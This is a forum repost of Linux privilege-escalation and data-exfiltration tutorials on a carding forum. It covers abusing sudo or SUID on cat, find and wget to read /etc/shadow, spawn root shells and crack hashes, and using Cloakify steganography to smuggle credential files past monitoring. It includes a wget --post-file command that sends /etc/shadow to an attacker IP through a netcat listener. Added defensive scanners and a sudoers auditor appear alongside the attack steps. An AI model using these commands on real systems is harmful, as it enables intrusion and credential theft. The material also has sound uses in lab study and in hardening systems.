Blackhat Carding Forum | Carding Forum - Credit Cards - Hacking Forum - Cracking Forum | Bhcforums.cc
[Guide] Linux for Pentester: CAT Privilege Escalation - Printable Version

[Guide] Linux for Pentester: CAT Privilege Escalation - NINZA - 05-14-2020

Today we are going to talk about the cat command, learn how helpful it is for Linux penetration testing, and see how cat can be used to obtain a higher-privileged shell.
NOTE: “The main objective of publishing the “Linux for pentester” series is to introduce the circumstances and hurdles that a pentester can face while solving CTF challenges or OSCP labs based on Linux privilege escalation. We are not criticizing any misconfiguration a network or system administrator makes by granting higher permissions on programs, binaries, files, etc.”
Table of Content
  • Introduction to CAT
  • Major Functions of CAT command
  • Sudo rights Lab setups for Privilege Escalation
  • Exploiting Sudo Rights
Introduction to CAT
In Linux, cat stands for “catenate” and is one of the most frequently used commands on Unix-like operating systems. It reads files and displays their content as output, which lets us create, view and join files. So cat is not only for viewing content: we can also copy the content of one file into another, view files with line numbers, and so on. Beyond that, we will do something new that you may not have thought of: privilege escalation using the cat command. That sounds interesting, doesn’t it? So, let’s start.
Major Functions of CAT command
First we will run cat --help, which lists all the options available for the cat command, as we can see in the picture below.
cat --help

[Image: 1.png?w=687&ssl=1]
Write and Read a file:
Our next step is to create a file with the cat command. For this we use the greater-than sign (>) after cat to create a new file. So we have created a new file named notes.txt with cat > notes.txt and typed the content we want to keep in the file; in our case I have written “Welcome to Hacking articles” in notes.txt.
cat > notes.txt

We can also append to an existing file without opening it in an editor by using the greater-than sign twice (>>); as you can see in the screenshot, we have added “Join Ignite Technologies” to notes.txt.
cat >> notes.txt
cat notes.txt

[Image: 2.png?w=687&ssl=1]
Now we can confirm this by reading the file once again.
cat notes.txt

[Image: 3.png?w=687&ssl=1]
Number all output lines:
Now let’s say we want to view the file contents preceded by line numbers, or in other words view the output serialized. First we create a new text file named dict.txt with some content, which the -n option then prints with a number in front of every line.
cat dict.txt
cat -n dict.txt

As a result, this adds a serial-number column for every line, as shown below:
[Image: 4.png?w=687&ssl=1]
Overwriting a file
Now we want to copy the content of dict.txt into notes.txt, or in other words overwrite notes.txt. To do this, first write the name of the file the content is copied from, then the greater-than sign (>), then the name of the file whose content is to be replaced.
Syntax: cat [file1] > [file2]
cat dict.txt > notes.txt

As you can observe in the picture below, we have replaced the content of notes.txt with that of dict.txt.
[Image: 5.png?w=687&ssl=1]
Concatenating files:
Now we want to merge two files, or in other words combine them. What do we do? It is again very simple: we use the greater-than sign, but now twice (>>), and the content is appended to the end of the second file. Here we have another new file, pass.txt, and we append dict.txt to it with >> as in the image below. Then we again use -n to number the combined content, as we did above.
cat > pass.txt
cat dict.txt >> pass.txt
cat -n pass.txt

As a result, you can observe that we have appended dict.txt to the pass.txt file.
[Image: 5.png?w=687&ssl=1]
Reverse order
As the name suggests, we can reverse all the content with the tac command, which is simply cat in reverse and exists for this purpose only.
cat dict.txt

First the file is printed with cat; then running tac on dict.txt prints the same lines in reverse order, a vertical flip of the file, as shown below.
[Image: 7.png?w=687&ssl=1]
Sudo rights Lab setups for Privilege Escalation
Now our next step is to set up the lab for sudo rights, in other words to grant a user sudo privileges for the cat executable. Here we add a user named test to the sudoers file and give user test permission to run the cat command as root.
[Image: 8.png?w=687&ssl=1]
Exploiting Sudo Rights
Now we connect to the target over SSH from Kali and run sudo -l (sudo list), which shows that user test has permission to run cat as root.
ssh test@<target IP>

Our next step is to exploit those sudo rights through the cat command, so we run sudo cat /etc/shadow to see all the users and their respective password hashes.
sudo -l
sudo cat /etc/shadow

Wonderful! We have the list of all users and their password hash values.
[Image: 9.png?w=687&ssl=1]
Cracking the Hash Password
Our next step is to crack the hash so that we obtain the password in plain text, for which we use the “John the Ripper” tool. First we pick one user whose password we want to check and save that user’s hash in a file named hash; after John has processed it, --show prints the cracked result. Run the following command in the terminal:
john hash --show

[Image: 10.png?w=687&ssl=1]
Great! We have cracked the password successfully. Now we switch to user raj to check whether we can log in with that password, and we see that we have successfully logged in as raj.
Now we run sudo -l to check the rights of user raj and find that he has full root permissions.
sudo -l
sudo su

Now we switch to user root with sudo su; we are logged in as root, and when we run the id command we see that we have a root shell.
So we have performed privilege escalation through the cat command successfully.
[Image: 12.png?w=687&ssl=1]

Today in this article we are back with another very useful command from the Linux for Pentester series, i.e. “Find”. The find command is used to search for files and directories, so knowing this, we will now illustrate how it can be used in privilege escalation.
Table of Content
Introduction to Find
  • Major Operation performed using Find
Exploiting Find
  • Sudo Rights Lab setups for Privilege Escalation
  • Exploiting Sudo rights
  • SUID Lab setups for Privilege Escalation
  • Exploiting SUID
Introduction to Find
The find command is a command-line facility for walking a directory hierarchy to locate files and directories matching the user’s criteria. It can search by a variety of attributes such as size, permissions, date of modification or access, user, group, and many more.
Like every command, find can be concisely understood through its help/man output, as in the image below.
find --help

[Image: 1.png?w=687&ssl=1]
Major Operation performed using Find
Search for a file by name in the current directory: This lets the user search for a file with a specific name. Suppose we want to search for a text file named “raj” in the current directory; then simply compose the command as in the screenshot below.
find . -name raj.txt

Search for a file by name in the home directory: If we wish to find all files with a given name, in our case “raj.txt”, under the home directory, then form the command as below:
find /home -name raj.txt

(It will find every “raj.txt” file under the home directory.)
Find files by extension: This is done by specifying the file extension together with the “-type f” option (regular files only). In our scenario we are searching for .txt files.
One can also use the “-type d” option instead of “-type f” to retrieve directories.
find / -type f -name "*.txt"

This command prints all .txt files as the desired output.
[Image: 2.png?w=687&ssl=1]
Find files with full permissions: To look for files that have full permissions, i.e. “777”, add “-perm 0777” to the find command together with the “-type f” option, which prints all files whose mode is exactly “777”.
find . -type f -perm 0777 -print

To find all files of a specific user in a directory: If we need to find all files that belong to a particular user under a chosen directory, we can run:
find /tmp -user raj

In our instance, we are finding all files that belong to user “raj” under the /tmp directory.
[Image: 3.png?w=687&ssl=1]
To find all hidden files: If we want to find all hidden files (names beginning with a dot) within a directory, we type the command as below:
find /tmp -type f -name ".*"

This command returns all hidden files in the given directory, here /tmp.
To find all readable files within a directory: To find all files that are readable by the current user from a specific directory. In the screenshot below we are looking for all readable files under the /etc directory; 2>/dev/null discards the permission-denied errors.
find /etc/ -readable -type f 2>/dev/null

By typing the above command, we get all readable files under /etc as output.
[Image: 4.png?w=687&ssl=1]
Find SUID files: Whenever a command with the SUID bit set runs, its effective UID becomes that of the file’s owner. So, if we want to find all files that carry the SUID bit, we can retrieve them by typing the command:
find / -perm -u=s -type f 2>/dev/null

[Image: 5.png?w=687&ssl=1]
Find SGID files: The SGID permission is similar to SUID; the only difference is that when a command with the SGID bit set runs, the process gets the group ownership of the file. So, to find all files that possess the SGID bit, type:
find / -perm -g=s -type f 2>/dev/null

[Image: 6.png?w=687&ssl=1]
To find SUID and SGID files simultaneously: If we want to fetch, in one go, all files on which either bit, SUID or SGID, is set, frame the command as below. The two -perm tests are grouped in escaped parentheses because find’s -o binds more loosely than the implicit -a; without the grouping, -type f would apply only to the SUID branch and SGID directories would be listed as well.
find / \( -perm -g=s -o -perm -u=s \) -type f 2>/dev/null

[Image: 7.png?w=687&ssl=1]
To find all writable directories: To find writable directories within a directory such as /home, /tmp or /root, we run the command as:
find /home -writable -type d 2>/dev/null

As per the image below, we have found all writable directories under /home.
[Image: 8.png?w=687&ssl=1]
Exploiting Find
Sudo Rights Lab setups for Privilege Escalation
Now we set up our lab for the find command by granting it higher privilege, i.e. administrative rights. As we know, the behaviour of every command changes under higher privileges; likewise we will check the find command, see what effect sudo rights have on it, and how it can be used further in privilege escalation.
To see this more clearly, we first create a local user (test) who can run find as root through sudo.
To add the sudo right, open the /etc/sudoers file and add the line below under the user privilege specification.
test  ALL=(root) NOPASSWD: /usr/bin/find

[Image: 9.png?w=687&ssl=1]
Exploiting Sudo rights
Now we exploit find by taking advantage of the sudoers permission. For this we must have a session on the victim’s machine giving us local user access to the target system, from which we escalate to the root user’s rights.
For this we connect to the target machine with SSH, so type the command shown below.
ssh test@<target IP>

Then we check the sudo rights of the “test” user (if any) and find that user “test” can execute the find command as “root” without a password.
sudo -l

The find command lets you perform specific actions such as “print, delete and exec”. Here we take advantage of “exec” to run /bin/bash through find, which gives a root shell:
sudo find /home -exec /bin/bash \;

On running the above command we have obtained a root shell, as shown in the image below.
[Image: 10.png?w=687&ssl=1]
SUID Lab setups for Privilege Escalation
As we know, the SUID bit lets a user execute a file with the permissions of the file’s owner. Now we enable the SUID bit on find so that a local user can run find as root.
Hence type the following to enable the SUID bit:
which find
chmod u+s /usr/bin/find
ls -la /usr/bin/find

[Image: 11.png?w=687&ssl=1]
Exploiting SUID
Since we have access to the victim’s machine, we use the find command to identify binaries that have the SUID bit set.
find / -perm -u=s -type f 2>/dev/null

Here we see that the SUID bit is enabled on many binaries, but the one we are concerned with is /usr/bin/find.
[Image: 12.png?w=687&ssl=1]
As we know, find lets the user perform specific actions such as print, delete and exec. So here again we use “exec” to run another command, i.e. “whoami”, as the file’s owner:
find raj -exec "whoami" \;

Similarly, you can take advantage of the find command to escalate to root privileges.
[Image: 13.png?w=687&ssl=1]
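The find -perm -u=s search above and the chmod u+s /usr/bin/find lab setup show why a defender should know exactly which set-id binaries belong on a host. As an added example (not from the original article), here is a Python scanner that lists SUID/SGID regular files and reports any that are absent from a baseline; the EXPECTED_SETID baseline and the sample scan result are constructed for illustration.

```python
import os
import stat

# Constructed, illustrative baseline of set-id binaries expected on a host.
# Build the real list from a known-good image of your own systems and keep it
# under version control; anything outside it deserves a look.
EXPECTED_SETID = {
    "/usr/bin/sudo", "/usr/bin/su", "/usr/bin/passwd", "/usr/bin/chsh",
    "/usr/bin/chfn", "/usr/bin/gpasswd", "/usr/bin/newgrp",
    "/usr/bin/mount", "/usr/bin/umount",
}

# Virtual filesystems that are pointless (and slow) to walk.
SKIP_DIRS = {"/proc", "/sys", "/dev", "/run"}


def setid_flags(mode: int) -> str:
    """Return 'SUID', 'SGID', 'SUID+SGID' or '' for an st_mode value.

    Only regular files count: an SGID directory merely propagates its group
    to new files, which is why the post's find commands use -type f.
    """
    if not stat.S_ISREG(mode):
        return ""
    flags = []
    if mode & stat.S_ISUID:
        flags.append("SUID")
    if mode & stat.S_ISGID:
        flags.append("SGID")
    return "+".join(flags)


def walk_setid(root: str = "/"):
    """Yield (path, flags) for every set-id regular file below root.

    Equivalent to: find / \\( -perm -u=s -o -perm -g=s \\) -type f 2>/dev/null
    Unreadable directories and vanished files are skipped silently, which is
    what 2>/dev/null does in the shell version.
    """
    for dirpath, dirnames, filenames in os.walk(root, onerror=lambda e: None):
        dirnames[:] = [d for d in dirnames
                       if os.path.join(dirpath, d) not in SKIP_DIRS]
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                mode = os.lstat(path).st_mode   # lstat: do not follow symlinks
            except OSError:
                continue
            flags = setid_flags(mode)
            if flags:
                yield path, flags


def unexpected_setid(found, baseline=frozenset(EXPECTED_SETID)):
    """Return the (path, flags) entries that are not in the baseline, sorted.

    A freshly chmod u+s'ed /usr/bin/find, as in the lab above, shows up here
    even though the full list contains dozens of legitimate entries.
    """
    return sorted((p, f) for p, f in found if p not in baseline)


if __name__ == "__main__":
    # Constructed scan result standing in for walk_setid("/") on a lab host.
    sample = [("/usr/bin/sudo", "SUID"), ("/usr/bin/passwd", "SUID"),
              ("/usr/bin/find", "SUID"), ("/usr/bin/wall", "SGID")]
    for path, flags in unexpected_setid(sample):
        print(f"UNEXPECTED {flags:9} {path}")
    # On a real host: for path, flags in unexpected_setid(walk_setid("/")): ...
```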

In our previous post we discussed “Cloud Storage Uploads for data exfiltration”, and today we are going to discuss a “Concealed Method for Data Exfiltration” to extract data without authorization. Here you will learn how an intruder can exfiltrate data through a steganography approach.
Table of Content
  • Overview
  • About Data Exfiltration
  • Cloakify Installation and Usages (for Linux)
  • Method -I
  • Method II
  • Cloakify Installation and Usages (for Windows)
Overview
We will perform a red-team exercise in which we attempt to collect important files from the victim’s machine by applying steganography through a concealed method. When copying information from the target machine, we transform the data to fool network monitors so that they cannot identify the data travelling in the network.
All of this can be performed with a single tool named “Cloakify Factory”.
Cloakify Factory transforms any file type (e.g. .zip, .exe, .xls, etc.) into a list of harmless-looking strings. This lets you hide the file in plain sight and transfer it without triggering alerts. The fancy term for this is “text-based steganography”: hiding data by making it look like other data. Cloaked files defeat signature-based malware detection tools.
About Data Exfiltration
Data exfiltration occurs when malware and/or a malicious actor carries out an unauthorized data transfer from a computer. It is also commonly called data extrusion or data exportation. Data exfiltration is also considered a form of data theft. During the past couple of decades, a number of data exfiltration efforts severely damaged the consumer confidence, corporate valuation, and intellectual property of businesses and national security of governments across the world.
[Image: 0.png?w=687&ssl=1]
Methods of Data Exfiltration
Open Methods:
  • HTTP/HTTPS Downloads & Uploads
  • FTP
  • Email
  • Instant Messaging
  • P2P filesharing
Concealed Methods:
  • SSH
  • VPN
  • Protocol Tunneling
  • Steganography
  • Timing channel

Cloakify Installation & Usages (for Linux)
CloakifyFactory: Data Exfiltration & Infiltration In Plain Sight; convert any file type into a list of everyday strings using text-based steganography; evade DLP/MLS devices, defeat data whitelisting controls, social engineering of analysts, evade AV detection.
You only need to type the following to download Cloakify from GitHub on the target machine (the repository URL is not shown in this copy):
git clone <Cloakify repository URL>
cd Cloakify
chmod -R 777 noiseTools

[Image: 1.png?w=687&ssl=1]
Let’s run the Python script to launch cloakifyfactory.py
python cloakifyFactory.py

CloakifyFactory is a menu-driven tool that leverages Cloakify Toolset scripts. When you choose to Cloakify a file, the scripts first Base64-encode the payload, then apply a cipher to generate a list of strings that encodes the Base64 payload. You then transfer the file however you wish to its desired destination. Once exfiltrated, choose Decloakify with the same cipher to decode the payload.
[Image: 2.png?w=687&ssl=1]
Let’s take an example now that we want to copy a text file “pwd.txt” from within the target system containing the login credentials of different machines in the network.
[Image: 3.png?w=687&ssl=1]
Method -I
It may be dangerous to copy the text file directly, so we transform the input file’s data into another file as output. To do so, follow the steps below:
  1. Run the Python script to launch cloakifyfactory.py
  2. Press 1 to select the “cloakify a file” option
  3. Enter the path of the source file that you want to transform as the input file.
  4. Enter the path of the destination file where you want to save the output.
  [Image: 4.png?w=687&ssl=1]
Next you get a list of ciphers; choose the desired option for encoding the file. Suppose I want the whole content to be turned into facial emojis.
  1. Press 3 for the emoji cipher
  2. Allow noise to be added to the cloaked file by pressing Y for yes.
  3. Then press 1 to select prependemoji.py as the noise generator.
This saves the output inside the raj.txt file.
[Image: 5.png?w=687&ssl=1]
As a result, you get output content like that shown in the image below.
[Image: 6.png?w=687&ssl=1]
Now if you want the output back in its original format, use the decloakify option, which reverses the transformation; but before that you have to make removeNoise.py executable (the article gives it full permissions):
chmod 777 removeNoise.py

[Image: 7.png?w=687&ssl=1]
To do so follow the below steps:
  1. Run the python script to launch cloakifyfactory.py
  2. Press 2 to select decloakify a file option
  3. Enter the path of the file that you want to restore back into its original format.
  4. Enter the path of the file to where you want to save the output.
[Image: 8.png?w=687&ssl=1]
Press Y to answer yes, because we added noise to the cloaked file, and select the noise generator.
[Image: 9.png?w=687&ssl=1]
Method II
Again we have a similar file that we want to cloak into another format directly, without using the cloakifyfactory console.
[Image: 10.png?w=687&ssl=1]

This time you can cloak the file with a single command by specifying the cipher, as given below:
[Image: 11.png?w=687&ssl=1]
python cloakify.py /root/Desktop/pwd.txt ciphers/starTrek

After executing the above command, the output looks like the image below.
[Image: 11.png?w=687&ssl=1]
Here we have redirected the output into file.txt as the destination file, storing the transformed content there instead of printing it on the screen. Then we used decloakify on that transformed file to revert it to its original state.
python cloakify.py /root/Desktop/pwd.txt ciphers/starTrek > /root/Desktop/file.txt
python decloakify.py /root/Desktop/file.txt ciphers/starTrek

[Image: 12.png?w=687&ssl=1]
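Because a cloaked file is, as described above, one cipher string per Base64 symbol, its lines are drawn from a vocabulary of a few dozen strings at most, and that property is something a monitoring tool can measure. As an added example (not the Cloakify project’s code), here is a Python heuristic that scores a text file on that property; the toy encoder is a stand-in for cloakify.py, assumed to mirror the mechanism the post describes, and is used only to build the constructed samples.

```python
import base64
import collections

# The symbols a Cloakify-style cipher must map: the Base64 alphabet plus '='.
B64_SYMBOLS = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="


def toy_cloak(payload: bytes, vocab: list) -> str:
    """Stand-in for cloakify.py, used here only to build a test sample.

    Assumption: it mirrors the mechanism the post describes (Base64-encode,
    then emit the cipher line at each symbol's index); it is not the tool's code.
    """
    if len(vocab) < len(B64_SYMBOLS):
        raise ValueError("cipher needs at least %d lines" % len(B64_SYMBOLS))
    encoded = base64.b64encode(payload).decode("ascii")
    return "".join(vocab[B64_SYMBOLS.index(ch)] + "\n" for ch in encoded)


def cloak_indicators(text: str, max_vocab: int = 66, min_lines: int = 40,
                     min_reuse: float = 3.0) -> dict:
    """Score a text file for Cloakify-style text-based steganography.

    A cloaked file is a long list of lines drawn from a tiny fixed vocabulary
    (at most 66 strings: 64 Base64 symbols, '=' padding and a spare or two),
    so its lines repeat far more than lines of prose, configuration or code
    do.  Noise generators such as prependEmoji.py put one random token in
    front of every line, so the count is repeated with the first
    whitespace-separated token removed (assumption: noise is one leading
    token).  Highly repetitive logs can trip this; treat it as a triage
    signal, not proof.
    """
    lines = [ln for ln in text.splitlines() if ln.strip()]
    stripped = [ln.split(None, 1)[-1] for ln in lines]
    total = len(lines)
    distinct = min(len(set(lines)), len(set(stripped)))
    reuse = total / distinct if distinct else 0.0
    suspicious = total >= min_lines and distinct <= max_vocab and reuse >= min_reuse
    return {"lines": total, "distinct": distinct,
            "reuse": round(reuse, 2), "suspicious": suspicious}


# Constructed samples (not real data): a cloaked secret, the same with
# prependEmoji-style noise, and ordinary text of similar length.
SECRET = b"user=admin password=CorrectHorseBatteryStaple host=10.0.0.5\n" * 6
VOCAB = ["item-%02d" % i for i in range(66)]      # stands in for a cipher file
CLOAKED = toy_cloak(SECRET, VOCAB)
NOISED = "".join("tok%d %s\n" % (i % 7, ln) for i, ln in enumerate(CLOAKED.splitlines()))
PROSE = "".join("line %d: an ordinary sentence number %d\n" % (i, i) for i in range(80))

if __name__ == "__main__":
    for name, sample in (("cloaked", CLOAKED), ("noised", NOISED), ("prose", PROSE)):
        print(name, cloak_indicators(sample))
```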
Cloakify Installation and Usages (For Windows)
As we all know, this is an exfiltration tool, and data can be exfiltrated from any platform, Linux or Windows based, so Cloakify Factory is available for both. In the first phase we used the Python-based application on a Linux machine; now we are going to deploy Cloakify Factory remotely on a Windows machine, using the Python MSI package as the dependency of our Python-based application.
Thus we download the MSI package on our local machine (Kali Linux); the download URL is not shown in this copy:
wget <URL of python-2.7.msi>

[Image: 13.png?w=687&ssl=1]
Our purpose now is to show how an intruder can exfiltrate data remotely using cloakifyfactory. So we first compromised the system and obtained a meterpreter session, then uploaded the MSI package to the victim’s machine to install the Python dependency.
upload python-2.7.msi .
shell
msiexec /i python-2.7.msi /qn

[Image: 14.png?w=687&ssl=1]
Now download the zip file of cloakifyfactory from GitHub on your local machine.
[Image: 15.png?w=687&ssl=1]
We also need to download the 7-Zip command-line program to extract cloakify-master.zip.
[Image: 16.png?w=687&ssl=1]
Now extract 7za920.zip and you get the 7za.exe file, which we have to put on the victim’s machine.
[Image: 17.png?w=687&ssl=1]
Now let’s upload 7za.exe and cloakify-master.zip to the remote system, and then use 7za.exe to unzip cloakify-master.zip.
Therefore, execute the following commands:
upload /root/Downloads/Cloakify-master.zip .
upload /root/Downloads/7za.exe
shell
7za.exe x cloakify-master.zip

[Image: 18.png?w=687&ssl=1]
Now we want to transfer the secret.txt file from the compromised machine, but copying the file directly might generate an alert, so we transform the data as done above.
[Image: 19.png?w=687&ssl=1]
Now we again convert the content of secret.txt by hiding it in a cloaked file. It is as simple as before, with a little modification: we run cloakify.py with the Windows Python interpreter.
C:\Python27\python.exe cloakify.py C:\Users\raj\Desktop\secret.txt ciphers\pokemonGo > dump.txt
type dump.txt

Thus we can observe that with the help of Cloakify we have transformed the file into a form that cannot be detected easily.
Conclusion: cloakify-factory can be very useful for exfiltrating data, as we saw it has many cipher scripts for cloaking a data file, and hence it is a very effective tool for text-based steganography.
[Image: 20.png?w=687&ssl=1]

In this article we describe the utility of the wget command and how vital it is in Linux penetration testing. Wget is used for downloading files from a server, so here we learn what else this command can do for privilege escalation.
Table of Content
Introduction to Wget
  • Major Operation performed using Wget
Exploiting Wget
  • Sudo Rights Lab setups for Privilege Escalation
  • Exploiting Sudo rights
  • SUID Lab setups for Privilege Escalation
  • Exploiting SUID
Introduction to Wget
The wget command is a command-line utility that lets the user download single or multiple files from the internet or a server over protocols such as HTTP, HTTPS and FTP. It supports many operations useful when downloading files, such as downloading multiple files, downloading in the background, resuming downloads, renaming a downloaded file and mirror downloading.
More of this command’s functionality can be understood from its help output; here we use the -h argument for that. The image below shows the list of arguments that can be used with wget. To view it, simply type the command:
wget -h

[Image: 1.png?w=687&ssl=1]
Major Operation performed using Wget
To download a file: wget can download a file or web page either in the foreground of the current terminal or in the background. Here I am downloading putty.exe to show the overall working of wget. Type the command below to download a single file, using the simple syntax wget [option] URL (the URL used in the article is not shown in this copy):
wget <URL of putty.exe>

To download a file in the background: As we know, wget is a non-interactive downloader that lets the user download a file in the background without interfering with the current process.
Here I am using the -b argument for this task, followed by the URL, as mentioned below.
wget -b <URL of putty.exe>

[Image: 2.png?w=687&ssl=1]
To save a download under another file name: In the image below we show how one can write the downloaded document to a file of a different name. We use the -O (uppercase) argument for this.
Type the command below for the same, in which I download putty.exe and save the output as raj.exe.
wget -O raj.exe <URL of putty.exe>

Halfway through the download I pause it by pressing Ctrl+C, stopping the download mid-session, just to explain how we can resume a download if a network failure, power cut or any other reason interrupts it.
To resume a download: As mentioned above, if any issue causes our download to fail, we can resume the incomplete download with the -c argument. See the command below, as per the screenshot:
wget -c -O raj.exe <URL of putty.exe>

[Image: 3.png?w=687&ssl=1]
To download multiple files simultaneously: wget also lets the user download multiple files at once instead of one by one. Suppose we have a file containing multiple links and want to download all of them together; then we use wget with the -i argument.
Here I create a file named “link” that contains two links, and I want to download both together. Type the command below to perform the task:
cat link
wget -i link

[Image: 4.png?w=687&ssl=1]
To turn off output: Whenever we want to silence the output of a download, we can use the -q argument. It lets the user download the file quietly by turning off the standard output, i.e. downloading in complete silence.
We use wget with the -q argument as shown below.
wget -q <URL of putty.exe>

There are many more options in wget, but in this post we have discussed only a few of them, because our aim is to demonstrate privilege escalation by exploiting wget. In the next phase you will learn how wget can be abused to obtain a root shell.
[Image: 5.png?w=687&ssl=1]
Exploiting wget
Sudo Rights Lab setups for Privilege Escalation
Now we set up our lab for the wget command with higher privilege, i.e. administrative rights. As we know, the behaviour of many commands changes after they get higher privileges; similarly we will check what impact sudo rights have on wget and how it can be used further for privilege escalation.
Refer to our earlier post on sudo rights for more information (link not available in this copy).
This can be clearly understood from the image below, in which I have created a local user (test) who can run wget as root via sudo.
To add the sudo right, open the /etc/sudoers file and add the following under the user privilege specification:
test  ALL=(root) NOPASSWD: /usr/bin/wget

[Image: 6.png?w=687&ssl=1]
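The sudoers entries set up in this post for cat, find and wget all grant a non-root user passwordless root execution of a binary that can read or write arbitrary files or run commands. As an added example (not part of the original article), here is a small Python audit that parses sudoers-style user specifications and flags such entries; the sample sudoers text and the RISKY_BINARIES table are constructed for illustration.

```python
import os
import re

# Binaries this post abuses once they may be run as root, with the reason.
# Extend the table for your own environment (GTFOBins is the usual reference).
RISKY_BINARIES = {
    "cat": "reads any file, e.g. /etc/shadow",
    "find": "-exec runs arbitrary commands",
    "wget": "--post-file sends any file to a remote host, -O overwrites any file",
}

# user_or_%group  host = (runas[:rungroup]) [TAG:] command[, command ...]
SPEC_RE = re.compile(
    r"^(?P<user>\S+)\s+(?P<host>[^=\s]+)\s*=\s*"
    r"(?:\((?P<runas>[^)]*)\)\s*)?"
    r"(?P<cmds>.+)$"
)
TAG_RE = re.compile(
    r"^(?:(?:NOPASSWD|PASSWD|NOEXEC|EXEC|SETENV|NOSETENV|"
    r"LOG_INPUT|NOLOG_INPUT|LOG_OUTPUT|NOLOG_OUTPUT)\s*:\s*)+"
)
SKIP_PREFIXES = ("Defaults", "Cmnd_Alias", "User_Alias", "Host_Alias",
                 "Runas_Alias", "@include")


def logical_lines(text):
    """Drop comments and blank lines; join backslash-continued lines."""
    out, buf = [], ""
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.endswith("\\"):
            buf += line[:-1] + " "
            continue
        out.append((buf + line).strip())
        buf = ""
    return out


def audit_sudoers(text):
    """Return (user, command, reason, nopasswd) for each entry that lets a
    non-root user run, as root, either anything at all or a binary from
    RISKY_BINARIES.  Aliases are not expanded; review those by hand."""
    findings = []
    for line in logical_lines(text):
        if line.startswith(SKIP_PREFIXES):
            continue
        m = SPEC_RE.match(line)
        if not m or m.group("user") == "root":
            continue
        runas = (m.group("runas") or "root").split(":")[0].strip() or "root"
        if runas not in ("root", "ALL"):
            continue                      # cannot become root through this entry
        nopasswd = False                  # a tag applies to all commands after it
        for cmd in m.group("cmds").split(","):
            cmd = cmd.strip()
            tag = TAG_RE.match(cmd)
            if tag:
                tags = tag.group(0).upper()
                nopasswd = "NOPASSWD" in tags or (nopasswd and "PASSWD" not in tags)
                cmd = cmd[tag.end():].strip()
            if not cmd:
                continue
            if cmd == "ALL":
                findings.append((m.group("user"), cmd, "unrestricted root", nopasswd))
                continue
            argv = cmd.split()
            binary = os.path.basename(argv[0])
            if binary in RISKY_BINARIES:
                reason = RISKY_BINARIES[binary]
                if len(argv) > 1:
                    reason += " (arguments restricted in sudoers; verify they cannot be bypassed)"
                findings.append((m.group("user"), cmd, reason, nopasswd))
    return findings


# Constructed sample, not taken from any real host.
SAMPLE_SUDOERS = """\
Defaults        env_reset
root    ALL=(ALL:ALL) ALL
%sudo   ALL=(ALL:ALL) ALL
test    ALL=(root) NOPASSWD: /usr/bin/cat, /usr/bin/find, \\
                             /usr/bin/wget
backup  ALL=(root) NOPASSWD: /usr/bin/rsync
www     ALL=(www-data) NOPASSWD: /usr/bin/find
"""

if __name__ == "__main__":
    try:
        text = open("/etc/sudoers").read()     # readable only as root
    except OSError:
        text = SAMPLE_SUDOERS
    for user, cmd, reason, nopasswd in audit_sudoers(text):
        print("%-8s %-16s [%s] %s" % (user, cmd, "NOPASSWD" if nopasswd else "password", reason))
```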
Exploiting Sudo rights
Now we exploit wget by taking advantage of the sudoers permission. Suppose we have a session on the victim’s machine giving us local user access to the target system, through which we can escalate to root rights.
First we connect to the target machine with SSH; type the following command to log in as the local user.
ssh test@<target IP>

Then we check the sudo rights of the “test” user (if any) and find that user “test” can execute the wget command as “root” without a password.
sudo -l

wget's --post-file option sends the content of a file as the body of an HTTP POST request, so it can be used to read and exfiltrate any file that wget is allowed to open. Because sudo runs it as root, that includes /etc/shadow. When no scheme is given, wget prepends http:// and connects to port 80, so a bare IP is enough.
Syntax: sudo /usr/bin/wget --post-file=<path of file> <Listening IP>
Since --post-file sends the shadow file to the listening IP, the listener on the attacker machine must be running first: open a new terminal there and start a netcat listener to receive the data (binding port 80 needs root on the attacker side).
Then, on the target, type:
sudo /usr/bin/wget --post-file=/etc/shadow 192.168.1.17
[Image: 7.png?w=687&ssl=1]
The netcat listener on port 80, started beforehand, writes everything it receives into the file "hash". Note that this capture also contains the HTTP request line and headers that wget sends ahead of the file body; john skips lines that are not hashes, but they are easy to strip.
nc -lvp 80 > hash
[Image: 8.png?w=687&ssl=1]
After this we have the content of the victim's shadow file inside our hash file and can run John the Ripper to crack the hashes:
Syntax: john <file name>
john hash
Hmmm!! As we can observe from the image below, it has cracked the password for user raj.
[Image: 9.png?w=687&ssl=1]
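The capture written by nc is a raw HTTP POST, not a bare shadow file. The following shell script, added here as an example and not part of the original post, strips the request line and headers from such a capture, keeps only the accounts that carry a real crypt hash (locked "*" and "!" entries give john nothing to do), and writes a trimmed file to feed to john. The capture it works on is constructed sample data; the raj entry reuses the MD5-crypt hash the post generates later with openssl.

```shell
#!/bin/sh
# Added example (not from the original post): clean up the file produced by
# `nc -lvp 80 > hash` before running john on it. wget --post-file sends a
# real HTTP POST, so the capture starts with the request line and headers;
# the shadow lines follow the first blank line.

# Constructed sample of such a capture (sample data, not from the post).
make_sample_capture() {
    printf 'POST / HTTP/1.1\r\n'
    printf 'User-Agent: Wget/1.20.3 (linux-gnu)\r\n'
    printf 'Accept: */*\r\n'
    printf 'Accept-Encoding: identity\r\n'
    printf 'Host: 192.168.1.17\r\n'
    printf 'Connection: Keep-Alive\r\n'
    printf 'Content-Type: application/x-www-form-urlencoded\r\n'
    printf 'Content-Length: 135\r\n'
    printf '\r\n'
    printf 'root:*:18000:0:99999:7:::\n'
    printf 'daemon:*:18000:0:99999:7:::\n'
    printf 'raj:$1$ignite$3eTbJm980Hz.k1NTdNxe1:18000:0:99999:7:::\n'
    printf 'test:!:18000:0:99999:7:::\n'
}

# Drop the HTTP request line and headers (everything up to and including the
# first blank line). CRLF is normalised first so that blank line is really empty.
strip_http_headers() {   # $1 = raw capture, $2 = cleaned shadow file
    tr -d '\r' < "$1" | sed '1,/^$/d' > "$2"
}

# Keep only accounts whose password field is a crypt hash (starts with "$").
# "*" and "!" mean the account is locked; there is nothing to crack there.
crackable_hashes() {   # $1 = shadow file
    awk -F: '$2 ~ /^\$/' "$1"
}

count_crackable() {   # $1 = shadow file
    awk -F: '$2 ~ /^\$/ { n++ } END { print n + 0 }' "$1"
}

WORK=$(mktemp -d)
make_sample_capture > "$WORK/hash"
strip_http_headers "$WORK/hash" "$WORK/shadow.txt"
crackable_hashes "$WORK/shadow.txt" > "$WORK/targets.txt"
echo "crackable accounts: $(count_crackable "$WORK/shadow.txt")"
# Now hand only the worthwhile lines to john, as in the post:
#   john "$WORK/targets.txt"
```

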